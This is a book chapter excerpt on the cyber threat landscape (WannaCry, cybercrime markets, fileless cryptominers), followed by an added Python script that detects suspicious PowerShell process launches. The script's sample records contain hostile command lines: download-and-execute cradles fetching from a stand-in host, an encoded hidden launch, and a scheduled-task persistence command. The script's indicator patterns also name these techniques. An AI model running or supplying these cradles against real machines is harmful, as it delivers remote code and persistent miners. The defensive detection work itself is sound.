The threat landscape

In this sample chapter from Microsoft Azure Security Center, 2nd Edition, authors Yuri Diogenes and Tom Shinder discuss cybercrime, the motivation of hackers, and how you can detect and prevent attacks.

On May 12, 2017, the mainstream media began covering a massive ransomware attack called WannaCry, which caught the world by surprise. It was reported that in a single day, 230,000 computers in more than 150 countries were infected. The attack was carried out by exploiting computers on which the MS17-010 patch—released in March 2017 to fix a Microsoft SMB vulnerability—had not been applied. In addition to affecting home users, this attack hit organizations such as the United Kingdom’s National Health Service (NHS). Computers that were patched were not affected. (This, of course, highlights the need to have a solid update-management process in place!)

Ransomware like WannaCry, or like Petya (more precisely its June 2017 variant, usually called NotPetya), which spreads laterally across a network so that a single infected machine can potentially bring down the entire network, is just one threat in the current landscape. There are many others. Before we dive into Azure Security Center, you need a good understanding of current threats and the motivations of the people behind them. Current threats range from old but effective techniques, such as phishing emails, to state-sponsored attacks, and everything in between. For example, one common threat is drive-by download sites. Another is Trojans. Then there is the weaponization of cloud resources to attack on-premises assets. This chapter explores several of these threats to prepare you to use Azure Security Center. But first, it discusses cybercrime and the cyber kill chain, establishing your security posture, and the assume-breach approach.

Understanding cybercrime

The days of hacking for status are largely behind us. Nowadays, the main motivator behind cyberattacks is some sort of financial gain.

The Internet Crime Complaint Center (IC3) is part of the Cyber Division of the US Federal Bureau of Investigation. According to its 2017 Internet Crime Report (https://pdf.ic3.gov/2017_ic3report.pdf), the IC3 received 1,783 complaints related to ransomware, with reported losses of more than $2.3 million. Tech-support fraud also left a mark, with roughly $15 million in reported losses in 2017. In total, the financial losses reported to the IC3 exceeded $1.42 billion in 2017.

You’re probably wondering how cybercriminals monetize the data they steal. That’s a great question. Many of these cybercriminals operate within organized crime groups that maintain a globally distributed criminal infrastructure for launching attacks. Each operation begins with a new attack campaign. To build that campaign, they buy services from technically sophisticated crime groups, which they find on online cybercriminal marketplaces.

These technical cybercriminals have different online offerings. For example, they might offer counter-antivirus (CAV) services, which test new malware against a range of antivirus engines to make sure it can be deployed without being detected. Another offering could be bulletproof hosting services for online criminal activity. (They’re called “bulletproof” because the owners of these servers do not cooperate with law enforcement in case of an investigation.) There are even escrow services that act as a trusted third party in transactions between technical criminals and their criminal clients.

Throughout 2017 and 2018, cybercriminals realized the opportunity to make money with cryptocurrencies by repurposing coin miners for malicious use. This is done by running a malware campaign that deploys and runs Trojanized miners on victims’ computers. For cryptocurrency miners to work properly and be more profitable, attackers must maintain persistence on the target system. The longer a miner stays undetected and resident in memory, the longer it can consume the victim’s CPU cycles (and electricity) for the attacker’s benefit.

To accomplish this goal, cybercriminals use advanced methods of code injection, such as fileless techniques. This kind of attack usually leverages tools that are already present on the target system, such as PowerShell (often called “living off the land”). By leveraging a tool that is already on the computer, attackers don’t need to write a malicious executable to disk; instead, they only need to take over a target process, run a piece of code in its memory space, and use that code to call the built-in tool that carries out the attack. Because nothing suspicious lands on disk, file-based antivirus scanning has little to find, and detection has to rely on telemetry such as process-creation and script-execution logs. The question here is: Do you have detections for that? Azure Security Center does!
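To make the detection problem concrete, here is an added example (not code from the book, and not how Azure Security Center implements its own analytics) that scores constructed process-creation records for the fileless PowerShell tradecraft just described: an encoded command launched from an Office application, a download cradle that runs a remote script purely in memory, and a scheduled task that re-runs the cradle to persist a miner. The record fields, indicator patterns, weights and alert threshold are assumptions made for illustration; the sample records are constructed, not real telemetry.

```python
"""Added example (not code from the book or from Azure Security Center):
score constructed process-creation records for fileless PowerShell tradecraft.
Field names, indicator patterns, weights and threshold are assumptions."""
import base64
import re

# Constructed payload: a download cradle that executes a remote script in memory.
# example.invalid is a reserved name and resolves nowhere.
CONSTRUCTED_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/miner.ps1')"
)
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(CONSTRUCTED_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed records modelled on Windows Security event 4688 / Sysmon event 1
# fields (parent image, image, command line). Illustrative, not real telemetry.
SAMPLE_EVENTS = [
    {   # ordinary admin use: nothing to flag
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    },
    {   # macro-style launch from Word: hidden window, policy bypass, encoded cradle
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + ENCODED,
    },
    {   # persistence: a scheduled task that re-runs the cradle every 10 minutes
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": 'schtasks /create /sc minute /mo 10 /tn "Updater" /tr '
                   '"powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://example.invalid/m.ps1\')"',
    },
]

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {  # name -> (pattern, weight); weights are an assumption for this example
    "download-cradle": (re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I), 3),
    "in-memory-exec": (re.compile(r"\bIEX\b|Invoke-Expression|FromBase64String|Reflection\.Assembly\]::Load|VirtualAlloc|WriteProcessMemory|CreateRemoteThread", re.I), 3),
    "evasion-flags": (re.compile(r"-w(?:indowstyle)?\s+hidden|-ex(?:ec(?:utionpolicy)?)?\s+bypass", re.I), 1),
    "persistence": (re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|CommandLineEventConsumer|CurrentVersion\\Run", re.I), 2),
}
# Script hosts and Office apps rarely have a legitimate reason to spawn PowerShell.
SUSPICIOUS_PARENT = re.compile(r"\\(?:winword|excel|powerpnt|outlook|mshta|wscript|cscript|wmiprvse|regsvr32|rundll32)\.exe$", re.I)
POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
ALERT_THRESHOLD = 4


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or an odd byte count
        return None


def analyze(event):
    """Score one record; the decoded payload is scanned alongside the raw command line."""
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + ("\n" + decoded if decoded else "")
    score, reasons = 0, []
    if decoded is not None:
        score, reasons = 2, ["encoded-command"]
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(text):
            score += weight
            reasons.append(name)
    if POWERSHELL.search(event["image"]) and SUSPICIOUS_PARENT.search(event["parent"]):
        score += 3
        reasons.append("suspicious-parent")
    return {"score": score, "reasons": reasons, "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


def scan(events):
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        flag = "ALERT" if res["alert"] else "ok   "
        print(f"{flag} score={res['score']:2d} {', '.join(res['reasons']) or '-'}  <- {ev['cmdline'][:60]}")
        if res["decoded"]:
            print("      decoded:", res["decoded"])
```

The point of decoding the encoded command before matching is that a pattern list run only over the raw command line misses the cradle entirely; the same idea applies to script block logging (event 4104), where the already-decoded script text is available and should be fed through the indicator list as well. Tuning the weights and threshold against your own baseline of legitimate PowerShell use is what keeps the benign first record quiet.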